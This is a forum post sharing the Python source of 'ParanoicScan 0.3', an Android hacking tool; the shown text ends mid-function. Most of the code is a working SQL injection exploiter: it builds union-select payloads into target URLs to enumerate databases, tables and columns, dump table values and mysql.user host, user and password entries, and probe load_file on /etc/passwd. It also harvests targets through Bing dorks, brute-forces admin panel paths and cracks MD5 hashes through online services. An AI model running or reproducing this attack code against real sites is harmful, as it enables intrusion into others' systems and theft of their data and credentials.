Author Topic: [Python-Android] ParanoicScan 0.3  (Read 1108 times)

0 Members and 1 Guest are viewing this topic.

Offline Doddy

  • Serf
  • *
  • Posts: 30
  • Cookies: 20
    • View Profile
[Python-Android] ParanoicScan 0.3
« on: February 03, 2014, 02:21:56 pm »
A simple script in python for android, which I use on my tablet, the script has the following functions:

  • Bing Scanner to find SQLI
  • A complete scanner SQLI
  • Search admin panel
  • MD5 encoder
  • Encoder & Decoder Base64 and Hex
  • Locator IP and DNS
  • Crack MD5 hashes
  • HTTP FingerPrinting


Some pictures:























The source :

Code: [Select]
#!usr/bin/python
# -*- coding: utf-8 -*-
#################################################################################
#This software is Copyright (c) 2014 by Doddy Hackman.
#
#This is free software, licensed under:
#
#  The Artistic License 1.0
#
#The Artistic License
#
#Preamble
#
#The intent of this document is to state the conditions under which a Package
#may be copied, such that the Copyright Holder maintains some semblance of
#artistic control over the development of the package, while giving the users of
#the package the right to use and distribute the Package in a more-or-less
#customary fashion, plus the right to make reasonable modifications.
#
#Definitions:
#
#  - "Package" refers to the collection of files distributed by the Copyright
#    Holder, and derivatives of that collection of files created through
#    textual modification.
#  - "Standard Version" refers to such a Package if it has not been modified,
#    or has been modified in accordance with the wishes of the Copyright
#    Holder.
#  - "Copyright Holder" is whoever is named in the copyright or copyrights for
#    the package.
#  - "You" is you, if you're thinking about copying or distributing this Package.
#  - "Reasonable copying fee" is whatever you can justify on the basis of media
#    cost, duplication charges, time of people involved, and so on. (You will
#    not be required to justify it to the Copyright Holder, but only to the
#    computing community at large as a market that must bear the fee.)
#  - "Freely Available" means that no fee is charged for the item itself, though
#    there may be fees involved in handling the item. It also means that
#    recipients of the item may redistribute it under the same conditions they
#    received it.
#
#1. You may make and give away verbatim copies of the source form of the
#Standard Version of this Package without restriction, provided that you
#duplicate all of the original copyright notices and associated disclaimers.
#
#2. You may apply bug fixes, portability fixes and other modifications derived
#from the Public Domain or from the Copyright Holder. A Package modified in such
#a way shall still be considered the Standard Version.
#
#3. You may otherwise modify your copy of this Package in any way, provided that
#you insert a prominent notice in each changed file stating how and when you
#changed that file, and provided that you do at least ONE of the following:
#
#  a) place your modifications in the Public Domain or otherwise make them
#     Freely Available, such as by posting said modifications to Usenet or an
#     equivalent medium, or placing the modifications on a major archive site
#     such as ftp.uu.net, or by allowing the Copyright Holder to include your
#     modifications in the Standard Version of the Package.
#
#  b) use the modified Package only within your corporation or organization.
#
#  c) rename any non-standard executables so the names do not conflict with
#     standard executables, which must also be provided, and provide a separate
#     manual page for each non-standard executable that clearly documents how it
#     differs from the Standard Version.
#
#  d) make other distribution arrangements with the Copyright Holder.
#
#4. You may distribute the programs of this Package in object code or executable
#form, provided that you do at least ONE of the following:
#
#  a) distribute a Standard Version of the executables and library files,
#     together with instructions (in the manual page or equivalent) on where to
#     get the Standard Version.
#
#  b) accompany the distribution with the machine-readable source of the Package
#     with your modifications.
#
#  c) accompany any non-standard executables with their corresponding Standard
#     Version executables, giving the non-standard executables non-standard
#     names, and clearly documenting the differences in manual pages (or
#     equivalent), together with instructions on where to get the Standard
#     Version.
#
#  d) make other distribution arrangements with the Copyright Holder.
#
#5. You may charge a reasonable copying fee for any distribution of this
#Package.  You may charge any fee you choose for support of this Package. You
#may not charge a fee for this Package itself. However, you may distribute this
#Package in aggregate with other (possibly commercial) programs as part of a
#larger (possibly commercial) software distribution provided that you do not
#advertise this Package as a product of your own.
#
#6. The scripts and library files supplied as input to or produced as output
#from the programs of this Package do not automatically fall under the copyright
#of this Package, but belong to whomever generated them, and may be sold
#commercially, and may be aggregated with this Package.
#
#7. C or perl subroutines supplied by you and linked into this Package shall not
#be considered part of this Package.
#
#8. The name of the Copyright Holder may not be used to endorse or promote
#products derived from this software without specific prior written permission.
#
#9. THIS PACKAGE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR IMPLIED
#WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
#MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
#
#The End
#
#################################################################################
#Paranoic Scan 0.3
#Android Version
#(C) Doddy Hackman 2014
#################################################################################

import android,urllib2,socket,binascii,re,base64,hashlib

webvul = ""

# Functions

def hexencoder(texto):
 return "[+] Result : "+"0x"+str(binascii.hexlify(texto))

def hexdecoder(texto):
 text = re.sub("0x","",texto)
 return "[+] Result : "+binascii.unhexlify(text)
 
def base64encoder(texto):
 return "[+] Result : "+base64.b64encode(texto)
 
def base64decoder(texto):
 return "[+] Result : "+base64.b64decode(texto)

def md5encoder(texto):
 return "[+] Result : "+hashlib.md5(texto).hexdigest()

def reem(texto,parte):
 return re.sub(parte,"hackman",texto)

def regexver(code):
 if (re.findall("K0BRA(.*?)K0BRA",code)):
  return True
 else:
  return False

def regexdar(code):
 if (re.findall("K0BRA(.*?)K0BRA",code)):
  return re.findall("K0BRA(.*?)K0BRA",code)[0]

def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()

def tomar(web,vars) :
 nave = urllib2.build_opener()
 nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
 return nave.open(web,vars).read()

def getdata(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).info()

def bypass(bypass):
 if bypass == "--":
  return("+","--")
 elif bypass == "/*":
  return("/**/","/**/")
 else:
  return("+","--")
 
def showtables(web):
 pass1,pass2 = bypass("--")
 respuesta = ""
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 respuesta = respuesta + "[+] Searching tables ...\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  respuesta = respuesta + "[+] Tables Found : "+numbers+"\n\n"   
  for counter in range(17,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    respuesta = respuesta + "[Table Found] : "+table+"\n"
 else:
  respuesta = respuesta + "[-] Not Found\n"
 respuesta = respuesta + "\n[+] Finished"
 return respuesta

def showcolumns(web,tabla):
 respuesta = ""
 pass1,pass2 = bypass("--")
 tabla2 = tabla
 tabla = "0x"+str(binascii.hexlify(tabla))
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
 respuesta = respuesta + "[+] Searching columns ...\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  respuesta = respuesta + "[+] Columns Found : "+numbers+"\n"   
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    respuesta = respuesta + "\n[Column Found in table "+str(tabla2)+"] : "+str(column)
 else:
  respuesta = respuesta + "[-] Not Found"
 respuesta = respuesta + "\n\n[+] Finished"
 return respuesta
 
def showdbs(web):
 respuesta = ""
 pass1,pass2 = bypass("--")
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
 respuesta = respuesta + "[+] Searching DBS ...\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  respuesta = respuesta + "[+] DBS Found : "+numbers+"\n"   
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    db = re.findall("K0BRA(.*?)K0BRA",code2)
    db = db[0]
    respuesta = respuesta + "\n[DB Found] : "+db
 else:
  respuesta = respuesta + "[-] Not Found"
 respuesta = respuesta + "\n\n[+] Finished"
 return respuesta

def dumper(web,table,col1,col2):
 respuesta = ""
 pass1,pass2 = bypass("--")
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
 code1 = toma(web1+pass1+"from"+pass1+table+pass2)
 respuesta = respuesta + "[+] Searching values ...\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  respuesta = respuesta + "[+] Values Found : "+numbers+"\n"   
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)   
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    c1 = re.findall("K0BRA(.*?)K0BRA",code2)
    c1 = c1[0]
    c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
    c2 = c2[0]
    respuesta = respuesta + "\n["+col1+"] : "+c1+"\n"
    respuesta = respuesta + "["+col2+"] : "+c2+"\n"
 else:
  respuesta = respuesta + "[-] Not Found\n"
 respuesta = respuesta + "\n[+] Finished"
 return respuesta

def mysqluser(web):
 pass1,pass2 = bypass("--")
 respuesta = ""
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 respuesta = respuesta + "[+] Searching mysql.user ...\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  respuesta = respuesta + "[+] Users Found : "+numbers+"\n"   
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    host = re.findall("K0BRA(.*?)K0BRA",code2)
    host = host[0]
    user = re.findall("K0BRA1(.*?)K0BRA1",code2)
    user = user[0]
    passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
    passw = passw[0]
    respuesta = respuesta + "\n[Host] : "+host
    respuesta = respuesta + "\n[User] : "+user
    respuesta = respuesta + "\n[Pass] : "+passw+"\n"   
 else:
  respuesta = respuesta + "[-] Not Found\n"
 respuesta = respuesta + "\n[+] Finished"
 return respuesta
 
def showcolumnsdb(web,db,table):
 respuesta = ""
 db2 = db
 table2 = table
 db = "0x"+str(binascii.hexlify(db))
 table = "0x"+str(binascii.hexlify(table))
 pass1,pass2 = bypass("--")
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)   
 respuesta = respuesta + "[+] Searching columns in DB ...\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  respuesta = respuesta + "\n[+] Columns Found : "+str(numbers)+"\n"   
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    respuesta = respuesta + "\n[Column Found] : "+str(column)
 else:
  respuesta = respuesta + "\n[-] Not Found"
 respuesta = respuesta + "\n\n[+] Finished"
 return respuesta
 
def showtablesdb(web,db):
 respuesta = ""
 db2 = db
 db = "0x"+str(binascii.hexlify(db))
 pass1,pass2 = bypass("--")
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)   
 respuesta = respuesta + "[+] Searching tables in DB ...\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  respuesta = respuesta + "[+] Tables Found : "+str(numbers)+"\n"   
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    respuesta = respuesta + "\n[Table Found] : "+table
 else:
  respuesta = respuesta + "[-] Not Found"
 respuesta = respuesta + "\n\n[+] Finished"
 return respuesta

def more(web):
 respuesta = ""
 pass1,pass2 = bypass("--")
 otraweb = web
 respuesta = respuesta + "[+] Searching DB Details ...\n"
 hextest = "0x2f6574632f706173737764"
 web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
 code0 = toma(web1+pass2)
 if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  datar = re.split("K0BRA",datax[0])
  respuesta = respuesta + "\n[+] Username : "+datar[1]
  respuesta = respuesta + "\n[+] Database : "+datar[2]
  respuesta = respuesta + "\n[+] Version : "+datar[3]+"\n"

 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 if (re.findall("K0BRA",code1)):
   respuesta = respuesta + "\n[+] mysql.user : on"
 code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 if (re.findall("K0BRA",code2)):
   respuesta = respuesta + "\n[+] information_schema.tables : on"
 codetres = toma(web2)
 if (re.findall("ERTOR854",codetres)):
  respuesta = respuesta + "\n[+] load_file() : on"
 respuesta = respuesta + "\n\n[+] Finished"
 return respuesta
 
def httpfinger(target):
 respuesta = ""
 try:
  respuesta = respuesta + str(getdata(target))
 except:
  respuesta = respuesta + "[-] Error"
 return respuesta

def scanpanel(web):
 contador = 0
 panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
 respuesta = ""
 respuesta = respuesta + "[+] Scanning ...\n"
 for path in panels:
  try:
   toma(web+"/"+path)
   respuesta = respuesta + "\n[+] Link : "+web+"/"+path
   contador = contador + 1
  except urllib2.URLError, e:
   pass

 if(contador==0) :
  respuesta = respuesta + "\n[+] Not Found"
 respuesta = respuesta + "\n\n[+] Finished"
 return respuesta

def crackmd5(md5) :
 respuesta = ""
 code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
 if (re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)):
  rex = re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)
  return "[+] Hash : "+rex[0][1]
 else:
  code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
  if (re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)):
   rex = re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)
   return "[+] Hash : "+rex[0]
  else:
   code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
   if (re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)):
    rex = re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)
    return "[+] Hash : "+rex[0]
   else:
    return "[+] Hash : Not Found"
 return respuesta
 
def locateip(pagina):

 respuesta = ""

 ip = socket.gethostbyname(str(pagina))
 code = toma("http://www.melissadata.com/lookups/iplocation.asp?ipaddress="+ip)

 respuesta = respuesta + "[++] IP Address Location\n"

 if (re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  rex = re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  city = rex[0][1]
  respuesta = respuesta + "\n[++] City : "+city
 else:
  respuesta = respuesta + "\n[++] City : Not Found"

 if (re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  rex = re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  country = rex[0][1]
  respuesta = respuesta + "\n[++] Country : "+country
 else:
  respuesta = respuesta + "\n[++] Country : Not Found"
 
 if (re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  rex = re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  state = rex[0][1]
  respuesta = respuesta + "\n[++] State : "+state
 else:
  respuesta = respuesta + "\n[++] State : Not Found"

 
 code = toma("http://www.ip-adress.com/reverse_ip/"+ip)

 if (re.findall("whois\/(.*?)\">Whois",code)):
  rex = re.findall("whois\/(.*?)\">Whois",code)
  respuesta = respuesta + "\n\n[++] DNS Founds\n"
  for dns in rex:
   respuesta = respuesta + "\n[+] "+dns

 return respuesta

def sqltest(webs):
 respuesta = ""
 for web in webs :
  if re.findall("=",web):
   web = re.split("=",web)
   web = web[0]+"="

   try:
    code = toma(web+"-1+union+select+1--")
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
     respuesta = respuesta + "[SQLI] : "+web+"\n"
   except:
    pass
 return respuesta

def limpiar(pag):
 
 limpia = []
 for p in pag:
  if p not in limpia:
   limpia.append(p)
 return limpia
 
def bingscan(dork,count):

 respuesta = ""
 
 pag = []
 s = 10 
 
 while s <= int(count):
  try:
   code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
   d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
   s += 10
   for a in d:
    pag.append(a)
  except:
   pass
 
 pag = limpiar(pag)

 return pag
 

##
 
aplicacion = android.Android()

def menuencoder():

 aplicacion.dialogCreateAlert("Encoders")
 aplicacion.dialogSetItems(["MD5 Encoder","Base64 Encoder","Base64 Decoder","Hex Encoder","Hex Decoder","Exit"])
 aplicacion.dialogShow()
 reh = aplicacion.dialogGetResponse().result
 reb = reh["item"]
 
 if reb==0:

  aplicacion.dialogCreateAlert("MD5 Encoder")
 
  aplicacion.dialogGetInput("MD5 Encoder","Enter Text")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menuencoder()
  else:
   texto = ref['value']

   aplicacion.dialogCreateSpinnerProgress("MD5 Encoder","[+] Encoding ...")
   aplicacion.dialogShow()

   don = md5encoder(texto)

   aplicacion.dialogDismiss()
 
   aplicacion.dialogCreateAlert("MD5 Encoder",don)
   aplicacion.dialogSetPositiveButtonText("Done")
   aplicacion.dialogShow()
 
   op = aplicacion.dialogGetResponse().result

   if op["which"] == "positive" :
    menuencoder()


 if reb==1 :

  aplicacion.dialogCreateAlert("Base64 Encoder")
 
  aplicacion.dialogGetInput("Base64 Encoder","Enter Text")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menuencoder()
  else:
   texto = ref['value']

   aplicacion.dialogCreateSpinnerProgress("Base64 Encoder","[+] Encoding ...")
   aplicacion.dialogShow()

   don = base64encoder(texto)

   aplicacion.dialogDismiss()
 
   aplicacion.dialogCreateAlert("Base64 Encoder",don)
   aplicacion.dialogSetPositiveButtonText("Done")
   aplicacion.dialogShow()
 
   op = aplicacion.dialogGetResponse().result

   if op["which"] == "positive" :
    menuencoder()
 
 if reb==2 :

  aplicacion.dialogCreateAlert("Base64 Decoder")
 
  aplicacion.dialogGetInput("Base64 Decoder","Enter Text")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menuencoder()
  else:
   texto = ref['value']

   aplicacion.dialogCreateSpinnerProgress("Base64 Decoder","[+] Encoding ...")
   aplicacion.dialogShow()

   don = base64decoder(texto)

   aplicacion.dialogDismiss()
 
   aplicacion.dialogCreateAlert("Base64 Decoder",don)
   aplicacion.dialogSetPositiveButtonText("Done")
   aplicacion.dialogShow()
 
   op = aplicacion.dialogGetResponse().result

   if op["which"] == "positive" :
    menuencoder()
 
 if reb==3 :

  aplicacion.dialogCreateAlert("Hex Encoder")
 
  aplicacion.dialogGetInput("Hex Encoder","Enter Text")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menuencoder()
  else:
   texto = ref['value']

   aplicacion.dialogCreateSpinnerProgress("Hex Encoder","[+] Encoding ...")
   aplicacion.dialogShow()

   don = hexencoder(texto)

   aplicacion.dialogDismiss()
 
   aplicacion.dialogCreateAlert("Hex Encoder",don)
   aplicacion.dialogSetPositiveButtonText("Done")
   aplicacion.dialogShow()
 
   op = aplicacion.dialogGetResponse().result

   if op["which"] == "positive" :
    menuencoder()


 if reb==4 :

  aplicacion.dialogCreateAlert("Hex Decoder")
 
  aplicacion.dialogGetInput("Hex Decoder","Enter Text")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menuencoder()
  else:
   texto = ref['value']

   aplicacion.dialogCreateSpinnerProgress("Hex Decoder","[+] Encoding ...")
   aplicacion.dialogShow()

   don = hexdecoder(texto)

   aplicacion.dialogDismiss()
 
   aplicacion.dialogCreateAlert("Hex Decoder",don)
   aplicacion.dialogSetPositiveButtonText("Done")
   aplicacion.dialogShow()
 
   op = aplicacion.dialogGetResponse().result

   if op["which"] == "positive" :
    menuencoder()

 if reb==5:
  menu()

def menusql():

 aplicacion.dialogCreateAlert("SQLI Scanner")
 aplicacion.dialogSetItems(["Get Tables","Get Columns","Get Databases","Get Tables of DB","Get Columns of DB","Get mysql.users","Get Details DB","Dump Values","Exit"])
 aplicacion.dialogShow()
 reez = aplicacion.dialogGetResponse().result
 opsql = reez["item"]
 
 if opsql==0:
     
  aplicacion.dialogCreateAlert("SQLI Scanner")
  aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables ...")
  aplicacion.dialogShow()

  don = showtables(webvul)

  aplicacion.dialogDismiss()
 
  aplicacion.dialogCreateAlert("SQLI Scanner",don)
  aplicacion.dialogSetPositiveButtonText("Done")
  aplicacion.dialogShow()
 
  op = aplicacion.dialogGetResponse().result

  if op["which"] == "positive" :
   menusql()
   
 if opsql==1 :
     
  aplicacion.dialogCreateAlert("SQLI Scanner")
 
  aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menusql()
  else:   
   tabla = ref['value']

   aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns ...")
   aplicacion.dialogShow()

   don = showcolumns(webvul,tabla)
   
   aplicacion.dialogDismiss()

   aplicacion.dialogCreateAlert("SQLI Scanner",don)
   aplicacion.dialogSetPositiveButtonText("Done")
   aplicacion.dialogShow()
 
   op = aplicacion.dialogGetResponse().result

   if op["which"] == "positive" :
    menusql()
   
 if opsql==2 :

  aplicacion.dialogCreateAlert("SQLI Scanner")
  aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Databases ...")
  aplicacion.dialogShow()

  don = showdbs(webvul)

  aplicacion.dialogDismiss()
 
  aplicacion.dialogCreateAlert("SQLI Scanner",don)
  aplicacion.dialogSetPositiveButtonText("Done")
  aplicacion.dialogShow()
 
  op = aplicacion.dialogGetResponse().result

  if op["which"] == "positive" :
   menusql()
   
 if opsql==3 :

  aplicacion.dialogCreateAlert("SQLI Scanner")
 
  aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menusql()
  else:   
   db = ref['value']

   aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables of DB ...")
   aplicacion.dialogShow()

   don = showtablesdb(webvul,db)
   
   aplicacion.dialogDismiss()

   aplicacion.dialogCreateAlert("SQLI Scanner",don)
   aplicacion.dialogSetPositiveButtonText("Done")
   aplicacion.dialogShow()
 
   op = aplicacion.dialogGetResponse().result

   if op["which"] == "positive" :
    menusql()

 if opsql==4 :

  aplicacion.dialogCreateAlert("SQLI Scanner")
 
  aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menusql()
  else:   
   db = ref['value']

   aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
   ref = aplicacion.dialogGetResponse().result

